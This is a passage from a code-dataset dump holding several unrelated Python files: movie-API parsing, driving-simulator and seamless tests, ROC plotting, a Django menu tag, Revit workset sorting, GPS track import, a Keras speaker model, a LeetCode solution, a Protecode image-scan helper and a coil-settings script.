Renner\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"돈 치들\",\n # \"peopleNmEn\": \"Don Cheadle\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"폴 러드\",\n # \"peopleNmEn\": \"Paul Rudd\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"브리 라슨\",\n # \"peopleNmEn\": \"Brie Larson\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"카렌 길런\",\n # \"peopleNmEn\": \"Karen Gillan\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"브래들리 쿠퍼\",\n # \"peopleNmEn\": \"Bradley Cooper\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"조슈 브롤린\",\n # \"peopleNmEn\": \"Josh Brolin\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # }\n # ],\n \"showTypes\": [\n {\n \"showTypeGroupNm\": \"2D\",\n \"showTypeNm\": \"디지털\"\n },\n {\n \"showTypeGroupNm\": \"3D\",\n \"showTypeNm\": \"3D 디지털\"\n },\n {\n \"showTypeGroupNm\": \"4D\",\n \"showTypeNm\": \"4D\"\n },\n {\n \"showTypeGroupNm\": \"IMAX\",\n \"showTypeNm\": \"IMAX\"\n },\n {\n \"showTypeGroupNm\": \"IMAX\",\n \"showTypeNm\": \"IMAX 3D\"\n }\n ],\n \"companys\": [\n {\n \"companyCd\": \"20161801\",\n \"companyNm\": \"월트디즈니컴퍼니코리아 유한책임회사\",\n \"companyNmEn\": \"The Walt Disney Company Korea\",\n \"companyPartNm\": \"배급사\"\n },\n {\n \"companyCd\": \"20161801\",\n \"companyNm\": \"월트디즈니컴퍼니코리아 유한책임회사\",\n \"companyNmEn\": \"The Walt Disney Company Korea\",\n \"companyPartNm\": \"수입사\"\n }\n ],\n \"audits\": [\n {\n \"auditNo\": \"2019-MF00676\",\n \"watchGradeNm\": \"12세이상관람가\"\n },\n {\n \"auditNo\": \"2019-MF00709\",\n \"watchGradeNm\": \"12세이상관람가\"\n }\n ],\n \"staffs\": [],\n # \"posterUrl\": \"https: 
//movie-phinf.pstatic.net/20190417_250/1555465284425i6WQE_JPEG/movie_image.jpg?type=m203_290_2\",\n # \"description\": \"인피니티 워 이후 절반만 살아남은 지구 마지막 희망이 된 어벤져스 먼저 떠난 그들을 위해 모든 것을 걸었다! 위대한 어벤져스 운명을 바꿀 최후의 전쟁이 펼쳐진다!\",\n # \"score\": \"9.51\",\n # \"stillCuts\": [\n # \"https://movie-phinf.pstatic.net/20190423_104/1555994321040d2AcJ_JPEG/movie_image.jpg?type=m665_443_2\",\n # \"https://movie-phinf.pstatic.net/20190423_5/1555994321522brgKj_JPEG/movie_image.jpg?type=m665_443_2\",\n # \"https://movie-phinf.pstatic.net/20190423_41/1555994321935RJdum_JPEG/movie_image.jpg?type=m665_443_2\"\n # ],\n # \"trailer\": \"TcMBFSGVi1c\"\n }\n \"\"\"\n\nmovie_dics = []\nmovie_genre_dics = []\nmovie_nation_dics = []\nmovie_director_dics = []\nmovie_actor_dics = []\nmovie_stillCut_dics = []\nfor i in range(len(daily_lists)):\n genre_lists = []\n nation_lists = []\n director_lists = []\n actor_lists = []\n stillCut_lists = []\n movie = {\n \"pk\": i + 41,\n \"model\": \"movies.movie\",\n \"fields\": {\n \"movieCd\": daily_lists[i][\"movieCd\"],\n \"movieNm\": daily_lists[i][\"movieNm\"],\n \"openDt\": daily_lists[i][\"openDt\"],\n \"audiAcc\": daily_lists[i][\"audiAcc\"],\n \"movieNmEn\": daily_lists[i][\"movieNmEn\"],\n \"showTm\": daily_lists[i][\"showTm\"],\n \"posterUrl\": daily_lists[i][\"posterUrl\"],\n \"description\": daily_lists[i][\"description\"],\n \"score\": daily_lists[i][\"score\"],\n \"trailer\": daily_lists[i][\"trailer\"]\n }\n }\n movie_dics.append(movie)\n \n for j in range(len(daily_lists[i][\"genres\"])):\n genre = daily_lists[i][\"genres\"][j][\"genreNm\"]\n if genre not in genre_lists:\n genre_lists.append(genre)\n movie_genre_dics.append(genre_lists)\n \n for k in range(len(daily_lists[i][\"nations\"])):\n nation = daily_lists[i][\"nations\"][k][\"nationNm\"]\n if nation not in nation_lists:\n nation_lists.append(nation)\n movie_nation_dics.append(nation_lists)\n \n for x in range(len(daily_lists[i][\"directors\"])):\n director = daily_lists[i][\"directors\"][x][\"peopleNm\"]\n if director not in director_lists:\n director_lists.append(director)\n movie_director_dics.append(director_lists)\n \n for y in range(len(daily_lists[i][\"actors\"])):\n actor = daily_lists[i][\"actors\"][y][\"peopleNm\"]\n if actor not in actor_lists:\n actor_lists.append(actor)\n movie_actor_dics.append(actor_lists)\n \n for z in range(len(daily_lists[i][\"stillCuts\"])):\n stillCut = daily_lists[i][\"stillCuts\"][z]\n stillCut_lists.append(stillCut) \n movie_stillCut_dics.append(stillCut_lists)\n \n \nprint(movie_dics,end=\"\\n\")\nprint(movie_genre_dics,end=\"\\n\")\nprint(movie_nation_dics,end=\"\\n\")\nprint(movie_director_dics,end=\"\\n\")\nprint(movie_actor_dics,end=\"\\n\")\nprint(movie_stillCut_dics,end=\"\\n\")\n\n\n# print(list(enumerate(movie_genre_dics, 41)),end='\\n')\n# print(list(enumerate(movie_nation_dics, 41)),end='\\n')\n# print(list(enumerate(movie_director_dics, 41)),end='\\n')\n# print(list(enumerate(movie_actor_dics, 41)),end='\\n')\n# print(list(enumerate(movie_stillCut_dics, 41)),end='\\n')","sub_path":"movies/API_CALL/KOFIC/get_daily_list.py","file_name":"get_daily_list.py","file_ext":"py","file_size_in_byte":13653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"595785511","text":"import gym\nimport gym_urbandriving as uds\nimport cProfile\nimport time\nimport numpy as np\nfrom copy import deepcopy\n\nfrom gym_urbandriving.agents import NullAgent, TrafficLightAgent, ControlAgent\nfrom gym_urbandriving.planning import 
RRTMPlanner\nfrom gym_urbandriving.assets import Car, TrafficLight\n\nNUM_CARS = 2\n\n\"\"\"\n Test File, to demonstrate general functionality of environment\n\"\"\"\n\ndef f():\n # Instantiate a PyGame Visualizer of size 800x800\n vis = uds.PyGameVisualizer((800, 800))\n\n # Create a simple-intersection state, with cars, no pedestrians, and traffic lights\n init_state = uds.state.SimpleIntersectionState(ncars=NUM_CARS, nped=0, traffic_lights=True)\n\n # Create the world environment initialized to the starting state\n # Specify the max time the environment will run to 500\n # Randomize the environment when env._reset() is called\n # Specify what types of agents will control cars and traffic lights\n # Use ray for multiagent parallelism\n env = uds.UrbanDrivingEnv(init_state=init_state,\n visualizer=vis,\n max_time=500,\n randomize=True,\n agent_mappings={Car:NullAgent,\n TrafficLight:TrafficLightAgent},\n use_ray=False\n )\n\n state = env.current_state\n agents = []\n\n for i in range(NUM_CARS):\n agents.append(ControlAgent(i))\n\n planner = RRTMPlanner(agents, planner='SST')\n plans = planner.plan(deepcopy(state))\n for i in range(NUM_CARS):\n state.dynamic_objects[i].trajectory = plans[i]\n\n\n action = None\n\n # Simulation loop\n while(True):\n # Determine an action based on the current state.\n # For KeyboardAgent, this just gets keypresses\n start_time = time.time()\n i = 0 \n\n actions = []\n for agent in agents:\n action = agent.eval_policy(state)\n actions.append(action)\n state, reward, done, info_dict = env._step_test(actions)\n \n # Simulate the state\n \n env._render()\n # keep simulator running in spite of collisions or timing out\n done = False\n # If we crash, sleep for a moment, then reset\n if done:\n print(\"done\")\n time.sleep(1)\n env._reset()\n state = env.current_state\n\n# Collect profiling data\ncProfile.run('f()', 'temp/stats')\n","sub_path":"examples/rrt_multi_test.py","file_name":"rrt_multi_test.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"97008856","text":"import seamless\nfrom seamless.core import context, cell, transformer\n\nseamless.database.connect()\n\nctx = context(toplevel=True)\n\ndef func(a, b):\n import time\n time.sleep(3)\n return a + b + 0.5\nctx.a = cell().set(1)\nctx.b = cell().set(2)\nctx.tf = transformer({\n \"a\": \"input\",\n \"b\": \"input\",\n \"result\": \"output\"\n})\nctx.result = cell()\nctx.code = cell(\"python\").set(func)\nctx.a.connect(ctx.tf.a)\nctx.b.connect(ctx.tf.b)\nctx.code.connect(ctx.tf.code)\nctx.tf.result.connect(ctx.result)\nctx.compute()\nprint(ctx.status)\nprint(ctx.tf.exception)\nctx.save_vault(\"./reuse-vault\")","sub_path":"tests/lowlevel/reuse1.py","file_name":"reuse1.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"63366951","text":"import argparse\nimport matplotlib; matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport os\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-r', '--rate', type=int, required=True,\n help='Payload rate (1=constant, 2=sqrt, 3=sqrt*log, 4=linear)')\nparser.add_argument(\"-t\", \"--with-title\", action='store_true',\n help=\"Include graph title\")\nargs = parser.parse_args()\n\nnum_sizes = 10\n# light pink, pink, purple, dark blue, light blue, cyan, green, yellow, orange,\n# red\ncolours = ['#F56EF6', '#9400D3', '#4B0082', '#0000FF', '#4FA1FD', '#00FFFF',\n 
'#00FF00', '#E6C900', '#FF7F00', '#FF0000']\nsizes = [320, 1056, 1472, 1792, 2048, 2304, 2528, 2720, 2912, 3072]\npayloads_1 = [49176] * num_sizes\npayloads_2 = [7683, 25356, 35345, 43029, 49176, 55323, 60702, 65312, 59922,\n 73764]\npayloads_3 = [5777, 23111, 33785, 42261, 49176, 56194, 62410, 67790, 73212,\n 77762]\npayloads_4 = [1200, 13074, 25404, 37650, 49176, 62239, 74929, 86743, 99421,\n 110647]\n\ngraph_title = ''\nfile_desc = ''\npayloads = []\nif args.rate == 1:\n payloads = payloads_1\n graph_title = 'Constant payload'\n file_desc = 'constant'\nelif args.rate == 2:\n payloads = payloads_2\n graph_title = r'Payload $\\propto \\sqrt{N}$'\n file_desc = 'sqrt'\nelif args.rate == 3:\n payloads = payloads_3\n graph_title = r'Payload $\\propto \\sqrt{N} \\cdot \\log{N}$'\n file_desc = 'sqrt_log'\nelse:\n payloads = payloads_4\n graph_title = r'Payload $\\propto N$'\n file_desc = 'linear'\n\n# Create plot\nplt.figure(figsize=(7,7))\n\n# Add curves to the plot\nfor i in range(0, num_sizes):\n roc_points_filename = \\\n 'roc/points/size{:d}_binary_{:d}b_roc.txt'.format(sizes[i], payloads[i])\n with open(roc_points_filename, 'r') as roc_points_file:\n lines = roc_points_file.readlines()\n x = []\n y = []\n min_pe_index = int(lines[-1]) - 1 # MATLAB is 1-indexed\n\n # Loop through all except the last line (which contains minPE index)\n for line in lines[:-1]:\n values = line.rstrip().split()\n x.append(float(values[0]))\n y.append(float(values[1]))\n\n plt.plot(x, y, color=colours[i], label=str(sizes[i]))\n plt.plot(x[min_pe_index], y[min_pe_index], color='k', marker='o',\n markersize=8)\n\n# Plot ROC curve of a random classifier for reference\nplt.plot([0.0,1.0], [0.0,1.0], color='#696969', linestyle='dashed')\n\nplt.xlabel(r'$f_p$')\nplt.ylabel(r'$1-f_n$')\nif args.with_title:\n plt.title(graph_title)\n\n# Place legend in bottom-right corner of plot\nplt.legend(loc='lower right', bbox_to_anchor=(1.0, 0.0))\n\n# Save plot\nplt.savefig('roc/curves/actor3_roc_{}_small_constant.png'.format(file_desc))\n","sub_path":"results/actor3_plot_roc_curves_small_constant.py","file_name":"actor3_plot_roc_curves_small_constant.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"602257667","text":"from django import template\nfrom product.models import Category\nfrom django.urls import reverse\n\nregister = template.Library()\n@register.simple_tag\ndef categorylist():\n return Category.objects.all()\n\n\n@register.simple_tag\ndef categoryTree(id,menu):\n if id <= 0:\n query = Category.objects.filter(parent_id__isnull=True).order_by(\"id\")\n querycount = query.count()\n else:\n query = Category.objects.filter(parent_id=id)\n querycount = query.count() \n\n if querycount > 0:\n for rs in query:\n subcount = Category.objects.filter(parent_id=rs.id).count()\n if subcount > 0:\n menu += '\\t
<li>\n'\n                menu += '\t<a href="#">'+ rs.title +'</a>\n'\n                menu += '\t\t<ul>\n'\n                menu += '\t\t\t<li>\n'\n                menu += categoryTree(int(rs.id),'')\n                menu += '\t\t\t</li>\n'\n                menu += '\t\t</ul>\n'\n                menu += "\t</li>\n\n"\n            else :\n                menu += '\t\t\t\t<li><a href="#">' + rs.title + '</a></li>
  • \\n'\n return menu\n","sub_path":"home/templatetags/myapptags.py","file_name":"myapptags.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"418891090","text":"__title__ = \"Workset by Category\"\n__doc__ = \"Appoints elements to worksets by category. Works only with ungrouped elements. Supports only common architectural categories\"\n\nfrom pyrevit import revit, DB, script, forms\n\ndef check_ungrouped():\n # Check that all elements have been ungrouped\n coll_groups = DB.FilteredElementCollector(revit.doc) \\\n .OfClass(DB.Group) \\\n .WhereElementIsNotElementType() \\\n .ToElements()\n if coll_groups:\n forms.alert(\"Ungroup elements first\", warn_icon=True)\n return False\n return True\n\ncat_dict = {\n \"Wall\": DB.BuiltInCategory.OST_Walls,\n \"Window\": DB.BuiltInCategory.OST_Windows,\n \"Floor\": DB.BuiltInCategory.OST_Floors,\n \"Slab\": DB.BuiltInCategory.OST_Floors,\n \"Stair\": DB.BuiltInCategory.OST_Stairs,\n \"Railing\": DB.BuiltInCategory.OST_StairsRailing,\n \"Doors\": DB.BuiltInCategory.OST_Doors,\n \"Furniture\": DB.BuiltInCategory.OST_Furniture,\n \"Plumbing\": DB.BuiltInCategory.OST_PlumbingFixtures,\n \"Roof\": DB.BuiltInCategory.OST_Roofs,\n \"Ceiling\": DB.BuiltInCategory.OST_Ceilings,\n}\n\n\n# Check model is workshared\nif forms.check_workshared(revit.doc, 'Model is not workshared.'):\n # Check all elements are ungrouped\n if check_ungrouped():\n\n # Collect all worksets in model with Filtered Workset Collector\n coll_worksets = DB.FilteredWorksetCollector(revit.doc).OfKind(DB.WorksetKind.UserWorkset)\n\n # Iterate through categories in dictionary\n\n for keyword in cat_dict:\n with revit.Transaction(keyword, revit.doc):\n for ws in coll_worksets:\n # check for keyword in workset name\n if keyword in ws.Name or keyword.upper() in ws.Name or keyword.lower() in ws.Name:\n\n # inverted workset filter - pick up elements that are not in workset\n ws_filter = DB.ElementWorksetFilter(ws.Id, True)\n # collect all elements of category\n coll_elements = DB.FilteredElementCollector(revit.doc) \\\n .OfCategory(cat_dict[keyword]) \\\n .WherePasses(ws_filter) \\\n .WhereElementIsNotElementType() \\\n .ToElements()\n\n counter = 0\n for w in coll_elements:\n # for each element get workset parameter\n w_param = w.get_Parameter(DB.BuiltInParameter.ELEM_PARTITION_PARAM)\n if not w_param.IsReadOnly: # don't touch elements with read-only parameter\n try:\n w_param.Set(ws.Id.IntegerValue) # set workset\n counter += 1\n finally:\n pass\n # annotate process\n print(\"Sorted {} elements to workset {}\".format(counter, ws.Name))","sub_path":"pyChilizer.tab/Tiny Tools.panel/Cleanup Tools.pulldown/Workset by Category.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"232844437","text":"\"\"\"\n Утилита для экспортирования точек из XML в БД.\n\"\"\"\n\nimport sys\nimport connection\nimport argparse\nimport xml.etree.ElementTree as etree\n\n\nxmlnm = 'http://www.topografix.com/GPX/1/0'\n\n\ndef runImport(track, trackId, printFlag):\n conn = connection.Connection()\n conn.openAll()\n\n iteration = 0\n\n sql = \"\"\"\n INSERT INTO device.tracks(track_id, lon, lat, speed, bearing, ts, the_geom)\n VALUES(%(id)s, %(lon)s, %(lat)s, %(speed)s, %(bearing)s, %(ts)s,\n ST_Transform(ST_SetSrid(ST_MakePoint(%(lon)s, %(lat)s), 4326), 3857))\n \"\"\"\n\n for point in 
track:\n lon, lat = point.attrib['lon'], point.attrib['lat']\n\n speedXml = point.findall('{%s}speed' % xmlnm)\n if len(speedXml) == 0:\n continue\n\n speed = float(speedXml[0].text)\n\n bearingXml = point.findall('{%s}course' % xmlnm)\n if len(bearingXml) == 0:\n continue\n\n bearing = bearingXml[0].text\n\n tsXml = point.findall('{%s}time' % xmlnm)\n ts = tsXml[0].text\n\n conn.execute(sql, {'id': trackId, 'lon': lon, 'lat': lat, 'speed': speed,\n 'bearing': bearing, 'ts': ts})\n\n if printFlag:\n print('Point №', iteration)\n\n iteration += 1\n\n conn.commit()\n\n print('Track successfully imported to database')\n\n\nif __name__ == '__main__':\n argsParser = argparse.ArgumentParser()\n\n argsParser.add_argument('-print', dest='isPrint', type=bool, default=False)\n argsParser.add_argument('-id', dest='id', type=str, required=True)\n argsParser.add_argument('-file', dest='file', type=str, required=True)\n\n args = argsParser.parse_args()\n\n tree = etree.parse(args.file)\n\n root = tree.getroot()\n\n trk = root.findall('{%s}trk' % xmlnm)[0]\n trkseq = trk.findall('{%s}trkseg' % xmlnm)[0]\n\n runImport(trkseq, args.id if args.id else args.file[:9], args.isPrint)\n","sub_path":"tools/xml_track_to_bd.py","file_name":"xml_track_to_bd.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"618404629","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Python中怎么创建闭包?\n# 在Python中创建一个闭包可以归结为以下三点:\n# 1.闭包函数必须有内嵌函数\n# 2.内嵌函数需要引用该嵌套函数上一级namespace中的变量\n# 3.闭包函数必须返回内嵌函数\n\n# 1.返回闭包时牢记一点:返回函数不要引用任何循环变量,或者后续会发生变化的变量。\ndef count():\n def f(j):\n def g():\n return j*j\n return g\n fs = []\n for i in range(1, 4):\n fs.append(f(i)) # f(i)立刻被执行,因此i的当前值被传入f()\n return fs\n# 测试\nf1, f2, f3 = count()\nprint(f1())\nprint(f2())\nprint(f3())\n\n\n# 2.利用闭包返回一个计数器函数,每次调用它返回递增整数\ndef createCounter():\n def fun1():\n n = 0\n while True:\n n = n + 1\n yield n\n it = fun1()\n def fun2():\n return next(it)\n return fun2\n# 测试\n# 测试:\ncounterA = createCounter()\nprint(counterA(), counterA(), counterA(), counterA(), counterA()) # 1 2 3 4 5\ncounterB = createCounter()\nif [counterB(), counterB(), counterB(), counterB()] == [1, 2, 3, 4]:\n print('测试通过!')\nelse:\n print('测试失败!')\n","sub_path":"functional_programing/closureDemo.py","file_name":"closureDemo.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"182313830","text":"\nimport numpy as np\nimport random\nimport sys\nimport io\nimport os\nimport glob\n\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.models import Model, load_model, Sequential\nfrom keras.layers import Dense, Activation, Dropout, Input, Masking, TimeDistributed, LSTM, Conv1D, Flatten\nfrom keras.layers import GRU, Bidirectional, BatchNormalization, Reshape, Concatenate,concatenate, Average\nfrom keras.optimizers import Adam\nfrom keras import backend as K\nfrom keras.models import load_model\nimport tensorflow as tf\n\n\ndef five_average_model(input_shape,base_model):\n model_inputs = []\n model_results = []\n for i in range(5):\n X_input = Input(shape = input_shape, name = \"Input\"+ str(i))\n model_inputs.append(X_input)\n result = base_model(X_input)\n model_results.append(result)\n \n X = Average()(model_results)\n model = Model(inputs = model_inputs,outputs = X)\n \n return model\n\ndef cosine_similarity(u, v):\n \"\"\"\n Cosine similarity reflects the degree of similariy between u and v\n \n 
Arguments:\n u -- a word vector of shape (n,) \n v -- a word vector of shape (n,)\n\n Returns:\n cosine_similarity -- the cosine similarity between u and v defined by the formula above.\n \"\"\"\n \n distance = 0.0\n \n dot = np.dot(u,v)\n norm_u = np.linalg.norm(u)\n norm_v = np.linalg.norm(v)\n cosine_similarity = dot/(norm_u*norm_v)\n \n return cosine_similarity\n\n \ndef triplet_loss(y_true, y_pred, alpha = 0.35):\n \"\"\"\n Implementation of the triplet loss as defined by formula (3)\n \n Arguments:\n y_true -- true labels, required when you define a loss in Keras, you don't need it in this function.\n y_pred -- python list containing three objects:\n anchor -- the encodings for the anchor images, of shape (None, 128)\n positive -- the encodings for the positive images, of shape (None, 128)\n negative -- the encodings for the negative images, of shape (None, 128)\n \n Returns:\n loss -- real number, value of the loss\n \"\"\"\n total_lenght = 64*3\n anchor, positive, negative = y_pred[:,0:int(total_lenght*1/3)],y_pred[:,int(total_lenght*1/3):int(total_lenght*2/3)],y_pred[:,int(total_lenght*2/3):int(total_lenght*3/3)]\n\n pos_dist = K.sum(K.square(anchor-positive),axis=1)\n\n neg_dist = K.sum(K.square(anchor-negative),axis=1)\n\n basic_loss = pos_dist-neg_dist+alpha\n loss = K.sum(K.maximum(basic_loss,0.0))\n \n return loss\n \ndef base_model(input_shape):\n \"\"\"\n Function creating the model's graph in Keras.\n \n Argument:\n input_shape -- shape of the model's input data (using Keras conventions)\n\n Returns:\n model -- Keras model instance\n \"\"\"\n \n X_input = Input(shape = input_shape)\n \n X = Conv1D(196,kernel_size = 15, strides = 4)(X_input)\n X = Activation('relu')(X) \n X = Dropout(rate = 0.2)(X) \n \n X = LSTM(units = 128, return_sequences = True)(X_input) \n X = Dropout(rate = 0.2)(X) \n \n X = LSTM(units = 128, return_sequences = True)(X) \n X = Dropout(rate = 0.2)(X) \n \n X = LSTM(units = 128)(X) \n X = Dropout(rate = 0.2)(X) \n \n X = Dense(64)(X)\n \n base_model = Model(inputs = X_input, outputs = X)\n\n return base_model \n \ndef speech_model(input_shape, average_model):\n \"\"\"\n Function creating the model's graph in Keras.\n \n Argument:\n input_shape -- shape of the model's input data (using Keras conventions)\n base_model -- model to be used to call the inputs\n\n Returns:\n model -- Keras model instance\n \"\"\"\n \n #get triplets vectors\n input_anchor = []\n input_positive = []\n input_negative = []\n for i in range(15):\n X_input = Input(shape = input_shape, name = \"Input\"+ str(i))\n if (i < 5):\n input_anchor.append(X_input)\n elif (i < 10):\n input_positive.append(X_input)\n elif(i < 15):\n input_negative.append(X_input)\n \n vec_anchor = average_model(input_anchor)\n vec_positive = average_model(input_positive)\n vec_negative = average_model(input_negative)\n \n #Concatenate vectors vec_positive, vec_negative\n concat_layer = concatenate([vec_anchor,vec_positive,vec_negative], axis = -1, name='concat_layer')\n \n model = Model(inputs = input_anchor + input_positive + input_negative, outputs = concat_layer, name = 'speech_to_vec')\n \n \n return model \n\ndef load_model_with_path(model_path):\n return load_model(model_path)\n\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"476435515","text":"\"\"\"\n实现 strStr() 函数。\n\n给定一个 haystack 字符串和一个 needle 字符串,在 haystack 字符串中找出 needle 字符串出现的第一个位置 (从0开始)。如果不存在,则返回 
-1。\n\n示例 1:\n\n输入: haystack = \"hello\", needle = \"ll\"\n输出: 2\n示例 2:\n\n输入: haystack = \"aaaaa\", needle = \"bba\"\n输出: -1\n说明:\n\n当 needle 是空字符串时,我们应当返回什么值呢?这是一个在面试中很好的问题。\n\n对于本题而言,当 needle 是空字符串时我们应当返回 0 。这与C语言的 strstr() 以及 Java的 indexOf() 定义相符。\n\"\"\"\n\n\nclass Solution:\n def strStr(self, haystack, needle):\n \"\"\"\n :type haystack: str\n :type needle: str\n :rtype: int\n \"\"\"\n if len(needle) == 0:\n return 0\n l1 = len(haystack)\n l2 = len(needle)\n if l1 < l2:\n return -1\n for i in range(l1-l2+1):\n if haystack[i] == needle[0]:\n t = 1\n for j in range(l2): # 首个字母匹配上之后,从此位置按照needle字符串循环验证\n if needle[j] != haystack[i+j]:\n t = 0\n break\n if t == 0:\n pass\n else:\n return i\n return -1\n","sub_path":"LeetCode/esay/028_Implement strStr().py","file_name":"028_Implement strStr().py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"119998510","text":"# Copyright (c) 2019 SAP SE or an SAP affiliate company. All rights reserved. This file is licensed\n# under the Apache Software License, v. 2 except as noted otherwise in the LICENSE file\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom concurrent.futures import ThreadPoolExecutor\nimport sys\nimport tabulate\nimport typing\n\nimport requests.exceptions\n\nimport protecode.client\nfrom product.scanning import ProtecodeUtil, ProcessingMode\nfrom util import info, warning, verbose, error\nfrom product.model import (\n UploadResult,\n)\nfrom protecode.model import (\n AnalysisResult,\n License,\n highest_major_cve_severity,\n)\n\n\ndef upload_images(\n protecode_cfg,\n product_descriptor,\n protecode_group_id=5,\n parallel_jobs=8,\n cve_threshold=7,\n ignore_if_triaged=True,\n processing_mode=ProcessingMode.UPLOAD_IF_CHANGED,\n image_reference_filter=lambda _: True,\n upload_registry_prefix: str=None,\n reference_group_ids=(),\n) -> typing.Sequence[typing.Tuple[AnalysisResult, int]]:\n executor = ThreadPoolExecutor(max_workers=parallel_jobs)\n protecode_api = protecode.client.from_cfg(protecode_cfg)\n protecode_api.set_maximum_concurrent_connections(parallel_jobs)\n protecode_util = ProtecodeUtil(\n protecode_api=protecode_api,\n processing_mode=processing_mode,\n group_id=protecode_group_id,\n upload_registry_prefix=upload_registry_prefix,\n reference_group_ids=reference_group_ids,\n )\n tasks = _create_tasks(\n product_descriptor,\n protecode_util,\n image_reference_filter\n )\n results = tuple(executor.map(lambda task: task(), tasks))\n\n relevant_results = filter_and_display_upload_results(\n upload_results=results,\n cve_threshold=cve_threshold,\n ignore_if_triaged=ignore_if_triaged,\n )\n\n _license_report = license_report(upload_results=results)\n\n return (relevant_results, _license_report)\n\n\ndef license_report(\n upload_results: typing.Sequence[UploadResult],\n) -> typing.Sequence[typing.Tuple[UploadResult, typing.Set[License]]]:\n for upload_result in upload_results:\n analysis_result = upload_result.result\n 
licenses = {\n component.license() for component in analysis_result.components()\n if component.license()\n }\n yield (upload_result, licenses)\n\n\ndef filter_and_display_upload_results(\n upload_results: typing.Sequence[UploadResult],\n cve_threshold=7,\n ignore_if_triaged=True,\n) -> typing.Sequence[typing.Tuple[AnalysisResult, int]]:\n # we only require the analysis_results for now\n results = [r.result for r in upload_results]\n\n results_without_components = []\n results_below_cve_thresh = []\n results_above_cve_thresh = []\n\n for result in results:\n components = result.components()\n if not components:\n results_without_components.append()\n continue\n\n greatest_cve = -1\n\n for component in components:\n vulnerabilities = filter(lambda v: not v.historical(), component.vulnerabilities())\n if ignore_if_triaged:\n vulnerabilities = filter(lambda v: not v.has_triage(), vulnerabilities)\n greatest_cve_candidate = highest_major_cve_severity(vulnerabilities)\n if greatest_cve_candidate > greatest_cve:\n greatest_cve = greatest_cve_candidate\n\n if greatest_cve >= cve_threshold:\n results_above_cve_thresh.append((result, greatest_cve))\n continue\n else:\n results_below_cve_thresh.append((result, greatest_cve))\n continue\n\n if results_without_components:\n warning(f'Protecode did not identify components for {len(results_without_components)}:\\n')\n for result in results_without_components:\n print(result.display_name())\n print('')\n\n def render_results_table(results: typing.Sequence[typing.Tuple[AnalysisResult, int]]):\n header = ('Component Name', 'Greatest CVE')\n results = sorted(results, key=lambda e: e[1])\n\n result = tabulate.tabulate(\n map(lambda r: (r[0].display_name(), r[1]), results),\n headers=header,\n tablefmt='fancy_grid',\n )\n print(result)\n\n if results_below_cve_thresh:\n info(f'The following components were below configured cve threshold {cve_threshold}')\n render_results_table(results=results_below_cve_thresh)\n print('')\n\n if results_above_cve_thresh:\n warning('The following components have critical vulnerabilities:')\n render_results_table(results=results_above_cve_thresh)\n\n return results_above_cve_thresh\n\n\ndef _create_task(protecode_util, container_image, component):\n def task_function():\n try:\n return protecode_util.upload_image(\n container_image=container_image,\n component=component,\n )\n except requests.exceptions.ConnectionError:\n error(\n 'A connection error occurred. This might be due problems with Protecode. 
'\n 'Please try executing the image scan job again.'\n )\n sys.exit(1)\n return task_function\n\n\ndef _create_tasks(product_model, protecode_util, image_reference_filter):\n for component in product_model.components():\n verbose('processing component: {c}:{v}'.format(c=component.name(), v=component.version()))\n component_dependencies = component.dependencies()\n for container_image in filter(\n image_reference_filter,\n component_dependencies.container_images()\n ):\n verbose('processing container image: {c}:{cir}'.format(\n c=component.name(),\n cir=container_image.image_reference(),\n )\n )\n yield _create_task(\n protecode_util=protecode_util,\n container_image=container_image,\n component=component,\n )\n","sub_path":"protecode/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":6529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"345254627","text":"#Takes json file of current settings\nimport sys\nimport json\nimport midas\n\n#Read the configuration file in \n#Access data as data[\"###\"] \nfilename = str(sys.argv[1]) \ndata = json.loads(open(filename).read())\n\n#Set up to access odb \nodb = midas.ODB('g2-field')\n\nfor i in range (1,101):\n bot_coil_str = \"/Equipment/Surface Coils/Settings/Set Points/Bottom Set Currents[\" + str(i-1) + 